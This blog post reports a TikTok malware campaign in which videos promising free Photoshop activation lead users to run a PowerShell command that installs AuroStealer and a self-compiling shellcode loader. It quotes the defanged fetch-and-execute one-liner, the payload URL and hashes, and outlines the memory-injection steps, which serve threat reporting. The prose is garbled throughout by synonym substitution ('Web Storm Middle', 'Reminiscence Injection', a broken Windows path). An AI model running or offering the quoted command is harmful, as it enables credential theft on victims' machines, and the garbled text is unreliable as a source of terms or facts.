Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution

Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution

Posted on October 17, 2025October 17, 2025 By CWS

Cybercriminals are exploiting TikTok’s huge person base to distribute subtle malware campaigns that promise free software program activation however ship harmful payloads as an alternative.

The assault leverages social engineering techniques paying homage to the ClickFix approach, the place unsuspecting customers are tricked into executing malicious PowerShell instructions on their techniques.

Victims encounter TikTok movies providing free activation of widespread software program like Photoshop, with one such video accumulating over 500 likes earlier than detection.

The assault chain begins when customers comply with directions to open PowerShell with administrator privileges and execute a deceptively easy one-liner command.

The preliminary an infection vector instructs victims to run the command iex (irm slmgr[.]win/photoshop), which fetches and executes malicious PowerShell code from a distant server.

This primary-stage payload (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23) achieved a VirusTotal detection charge of 17/63, demonstrating its evasive capabilities.

The script downloads a secondary executable known as updater.exe from hxxps://file-epq[.]pages[.]dev/updater.exe, which evaluation revealed as AuroStealer malware designed to reap delicate credentials and system info.

Faux TikTok video (Supply – Web Storm Middle)

Web Storm Middle researchers recognized the marketing campaign and found that persistence mechanisms are carried out by means of scheduled duties disguised as legit system processes.

The malware randomly selects process names comparable to “MicrosoftEdgeUpdateTaskMachineCore” to mix in with real Home windows providers, making certain execution at each person logon.

A 3rd payload named supply.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011) introduces a sophisticated evasion approach by compiling C# code on-demand throughout runtime utilizing the .NET Framework compiler situated at C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe.

Self-Compiling Approach and Reminiscence Injection

The self-compiling functionality represents a complicated method to evade conventional detection mechanisms.

The malware compiles a C# class throughout execution that imports kernel32.dll features together with VirtualAlloc, CreateThread, and WaitForSingleObject.

This dynamically compiled code allocates executable reminiscence area, injects shellcode straight into the method reminiscence, and creates a brand new thread to execute the malicious payload with out writing further information to disk.

Researchers found a number of variations of this marketing campaign throughout TikTok focusing on customers trying to find cracked variations of varied software program purposes, highlighting the significance of avoiding untrusted sources for software program downloads.

Comply with us on Google Information, LinkedIn, and X to Get Extra Immediate Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:Deploy, Execution, Hackers, Leverages, Malware, PowerShell, SelfCompiling, TikTok, Videos

Post navigation

Previous Post: Threat Actors Leveraging ClickFake Interview Attack to Deploy OtterCandy Malware
Next Post: Microsoft Windows 11 October Update Breaks Localhost (127.0.0.1) Connections

Related Posts

93+ Billion Stolen Users’ Cookies Flooded by Hackers on the Dark Web 93+ Billion Stolen Users’ Cookies Flooded by Hackers on the Dark Web Cyber Security News
4.3 Million Chrome and Edge Users Hacked in 7-Year ShadyPanda Malware Campaign 4.3 Million Chrome and Edge Users Hacked in 7-Year ShadyPanda Malware Campaign Cyber Security News
Threat Actors Leveraging RMM Tools to Attack Users via Weaponized PDF Files Threat Actors Leveraging RMM Tools to Attack Users via Weaponized PDF Files Cyber Security News
New Clickfix Attack Promises “Free WiFi” But Delivers Powershell Based Malware New Clickfix Attack Promises “Free WiFi” But Delivers Powershell Based Malware Cyber Security News
Microsoft Teams “couldn’t connect” Error Following Recent Sidebar Update Microsoft Teams “couldn’t connect” Error Following Recent Sidebar Update Cyber Security News
Iranian Cyber Attacks Target US Networks, Cameras for Surveillance Iranian Cyber Attacks Target US Networks, Cameras for Surveillance Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • F5 Resolves Over 50 Security Flaws in Software
  • Windows Vulnerabilities: BitLocker Bypass and CTFMON Exploit
  • Seedworm Group Exploits Signed Binaries for Cyber Attacks
  • Vulnerability in PraisonAI Exploited Within Hours
  • Langflow Vulnerability Exploited for AWS Key Theft

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • May 2026
  • April 2026
  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • F5 Resolves Over 50 Security Flaws in Software
  • Windows Vulnerabilities: BitLocker Bypass and CTFMON Exploit
  • Seedworm Group Exploits Signed Binaries for Cyber Attacks
  • Vulnerability in PraisonAI Exploited Within Hours
  • Langflow Vulnerability Exploited for AWS Key Theft

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark